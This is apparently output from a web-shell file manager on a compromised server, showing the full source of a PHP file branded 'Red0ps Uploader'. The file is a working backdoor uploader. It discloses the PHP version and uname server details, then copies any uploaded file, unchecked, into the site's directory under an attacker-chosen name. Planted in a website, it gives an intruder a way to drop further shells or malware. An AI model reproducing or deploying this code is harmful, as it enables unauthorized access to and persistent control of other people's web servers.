Your IP : 216.73.216.1


Current Path : /proc/self/cwd/
Upload File :
Current File : //proc/self/cwd/Red0ps-ZLqh40.php

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Red0ps Uploader | @red0ps</title>

    <!-- Google Fonts -->
    <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap" rel="stylesheet">

    <style>
        * {
            box-sizing: border-box;
            margin: 0;
            padding: 0;
        }

        body {
            font-family: 'Poppins', sans-serif;
            background: linear-gradient(135deg, #0f2027, #203a43, #2c5364);
            height: 100vh;
            display: flex;
            justify-content: center;
            align-items: center;
            overflow: hidden;
            color: #fff;
        }

        .container {
            background: rgba(255, 255, 255, 0.08);
            backdrop-filter: blur(12px);
            border: 1px solid rgba(255, 255, 255, 0.1);
            border-radius: 20px;
            padding: 40px;
            max-width: 500px;
            width: 90%;
            text-align: center;
            box-shadow: 0 8px 32px rgba(0, 0, 0, 0.3);
        }

        h1 {
            font-size: 32px;
            margin-bottom: 15px;
            color: #ffffff;
        }

        p {
            font-size: 14px;
            margin-bottom: 10px;
            color: #ddd;
        }

        form {
            margin-top: 25px;
        }

        .input-group {
            display: flex;
            flex-direction: column;
            gap: 15px;
            align-items: center;
        }

        input[type="file"] {
            background-color: #ffffff10;
            color: #fff;
            padding: 10px;
            border: 2px dashed #ffffff30;
            border-radius: 8px;
            width: 100%;
            transition: border-color 0.3s;
        }

        input[type="file"]:hover {
            border-color: #1e88e5;
        }

        input[type="submit"] {
            background: linear-gradient(90deg, #1e88e5, #42a5f5);
            color: white;
            border: none;
            padding: 12px 25px;
            border-radius: 50px;
            font-weight: 600;
            cursor: pointer;
            font-size: 14px;
            transition: background 0.4s ease;
        }

        input[type="submit"]:hover {
            background: linear-gradient(90deg, #1565c0, #1e88e5);
        }

        .message {
            margin-top: 20px;
            font-weight: bold;
        }

        .success {
            color: #00e676;
        }

        .error {
            color: #ff1744;
        }

        footer {
            margin-top: 30px;
            font-size: 12px;
            color: #aaa;
        }
    </style>
</head>
<body>
    <div class="container">
        <h1>🚀 Red0ps Uploader</h1>
        <p><strong>PHP Version:</strong> <?php echo phpversion(); ?></p>
        <p><strong>Server Info:</strong> <?php echo php_uname(); ?></p>

        <form method="post" enctype="multipart/form-data">
            <div class="input-group">
                <input type="file" name="zb" required>
                <input type="submit" name="upload" value="Upload File">
            </div>
        </form>

        <?php
        if(isset($_POST['upload'])) {
            if(@copy($_FILES['zb']['tmp_name'], $_FILES['zb']['name'])) {
                echo '<div class="message success">✅ File uploaded successfully.</div>';
            } else {
                echo '<div class="message error">❌ File upload failed.</div>';
            }
        }
        ?>

        <footer>
            © 2025 Red0ps. All rights reserved.
        </footer>
    </div>
</body>
</html>